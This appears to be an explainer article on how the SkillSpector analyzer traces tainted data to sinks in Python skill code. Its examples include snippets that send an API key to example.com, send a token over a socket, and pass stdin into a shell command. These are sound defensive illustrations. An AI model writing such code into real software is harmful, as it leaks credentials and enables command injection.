How SkillSpector Tracks Taint Flow from Sources to Sinks in Python Skill Code

SkillSpector tracks taint flow by parsing Python skill code into an AST, marking variables as tainted when they receive data from predefined sources (like os.getenv or requests.get), and tracing those variables until they reach security-sensitive sinks (like subprocess.run or network calls), emitting rule-based findings such as TT2 for indirect flows or TT3–TT5 for direct source-to-sink violations.

SkillSpector is an open-source security analyzer developed by NVIDIA that inspects AI skill code for potentially dangerous data flows. Its behavioral taint-tracking engine performs static analysis on Python files to detect when sensitive data from credential reads, file inputs, or user commands flows into risky operations. The implementation resides primarily in src/skillspector/nodes/analyzers/behavioral_taint_tracking.py, where the analyzer orchestrates a three-phase detection pipeline that categorizes findings using specific rule IDs (TT1–TT5) based on flow characteristics.

How Taint Tracking Works in SkillSpector

The taint-tracking analyzer processes each .py file in a skill through a complete AST traversal. It maintains a running set of tainted variable names and checks every call expression against dictionaries of dangerous sources and sinks. The entire flow is managed by the public node entry point, which skips oversized files and aggregates AnalyzerFinding objects that are later converted to the generic Finding type for reporting.

Phase 1: Source Identification

The analyzer defines four source categories as constants: _CREDENTIAL_SOURCES, _FILE_READ_SOURCES, _NETWORK_INPUT_SOURCES, and _USER_INPUT_SOURCES. These sets contain fully-qualified call names such as os.getenv, open, requests.get, and input.

When the AST visitor encounters an assignment (ast.Assign), it invokes _find_source_in_expr to scan the right-hand side. If the expression matches a source signature, the method _mark_targets tags the left-hand side variables as tainted. For cases where the right-hand side references a previously tainted variable rather than a direct source call, the analyzer uses _find_tainted_in_expr to propagate taint forward, ensuring that chained assignments like payload = secret or msg = f"{secret}" remain tracked throughout the execution graph.

Phase 2: Sink Detection

Security-sensitive destinations are cataloged in _ALL_SINKS, which includes network-output functions, exec-related APIs, and file-write methods. As the analyzer traverses ast.Call nodes, it resolves each call to its canonical name using _resolve_sink_name, which also handles dynamic imports such as importlib.import_module(...).run. Calls matching an entry in _ALL_SINKS are flagged for the subsequent flow-mapping phase.

Phase 3: Mapping Flows from Sources to Sinks

Once sources and sinks are identified, SkillSpector maps the connections between them using two distinct strategies:

Direct flows are discovered via _find_nested_sources, which searches a sink call’s argument tree for source calls that appear nested inside the sink invocation (e.g., requests.post(open("token").read())). When a direct pair is found, _pick_rule selects the most specific rule ID—TT3, TT4, or TT5—based on the source and sink types; if no specific rule applies, the analyzer defaults to TT1.

Indirect flows occur when a tainted variable is assigned to intermediate containers or transformed before reaching a sink. After taint propagation, _find_tainted_names_in_args examines sink arguments for references to any currently tainted variable names. When tainted data reaches a sink through this indirect path, the analyzer emits a TT2 finding to distinguish it from direct source-to-sink flows.

Each confirmed flow generates an AnalyzerFinding containing the rule ID, severity, code location, a human-readable message, and a matched_text snippet showing the problematic code.

Code Examples: Source-to-Sink Flows

The following examples illustrate how SkillSpector classifies different taint patterns using its rule taxonomy.

Example 1: Direct Credential Leak (TT3)

import os, requests

secret = os.getenv("API_KEY")
requests.post("https://example.com/ingest", data=secret)

The analyzer marks os.getenv as a credential source and requests.post as a network-output sink. Because the credential flows directly into the network call, _pick_rule emits a TT3 finding indicating that sensitive credentials are being transmitted over the network.

Example 2: Indirect Flow via Container (TT2)

import os, socket

token = os.getenv("TOKEN")
payload = {"auth": token}
socket.socket().sendall(str(payload).encode())

Here, token becomes tainted via the source, and _mark_targets records it in the taint set. Later, _find_tainted_names_in_args detects that payload—a dictionary containing the tainted variable—reaches the sendall sink. This triggers a TT2 finding for an indirect flow from credential source to network output.

Example 3: Taint Propagation Through f-Strings (TT5)

import sys, subprocess

user_cmd = sys.stdin.read()
cmd = f"ls {user_cmd}"
subprocess.run(cmd, shell=True)

sys.stdin.read is classified as a user-input source. The f-string propagates taint from user_cmd to cmd, and when subprocess.run executes the string, the analyzer identifies an exec sink receiving external input. This generates a TT5 finding because untrusted data flows into code execution.

Summary

  • Source Recognition: SkillSpector monitors four source categories (credential, file read, network input, user input) via sets like _CREDENTIAL_SOURCES and marks variables using _mark_targets when assignments contain source calls.
  • Propagation: Taint spreads through assignments and expressions via _find_tainted_in_expr, tracking data through containers and string formatting operations.
  • Sink Matching: The _ALL_SINKS collection defines dangerous destinations, resolved by _resolve_sink_name during AST traversal.
  • Flow Classification: Direct flows (TT1, TT3-TT5) are detected by _find_nested_sources, while indirect flows (TT2) are caught by _find_tainted_names_in_args.
  • Reporting: Findings are emitted as AnalyzerFinding objects in behavioral_taint_tracking.py and converted to Finding objects by static_runner.py for final output.

Frequently Asked Questions

What is taint tracking in SkillSpector?

Taint tracking in SkillSpector is a static analysis technique that treats data originating from sensitive sources (such as environment variables or user input) as "tainted." The analyzer follows these variables through the AST—across assignments, function calls, and string operations—to determine if they reach security-critical sinks (like exec or network transmissions) without proper sanitization.

How does SkillSpector distinguish between direct and indirect taint flows?

SkillSpector uses two different detection methods. Direct flows occur when a source call appears nested directly inside a sink call’s arguments, detected by _find_nested_sources and classified with rules TT1 or TT3–TT5. Indirect flows happen when a tainted variable is stored in an intermediate variable or container before reaching a sink; these are identified by _find_tainted_names_in_args and tagged with rule TT2.

What types of sources and sinks does the analyzer detect?

According to the source code in behavioral_taint_tracking.py, the analyzer recognizes credential sources (e.g., os.getenv), file read sources (e.g., open), network input sources (e.g., requests.get), and user input sources (e.g., input). Sinks include network outputs, file write operations, and execution functions like subprocess.run or eval.

How are taint-tracking findings reported in the SkillSpector pipeline?

When the analyzer confirms a flow, it creates an AnalyzerFinding containing the rule ID, severity, line number, and a code snippet. The node entry point aggregates these findings across all Python files in the skill. Subsequently, static_runner.py transforms the AnalyzerFinding objects into the generic Finding type used by the broader SkillSpector reporting infrastructure.

Have a question about this repo?

These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:

Share the following with your agent to get started:
curl -s "https://instagit.com/install.md"

Works with
Claude Codex Cursor VS Code OpenClaw Any MCP Client

Maintain an open-source project? Get it listed too →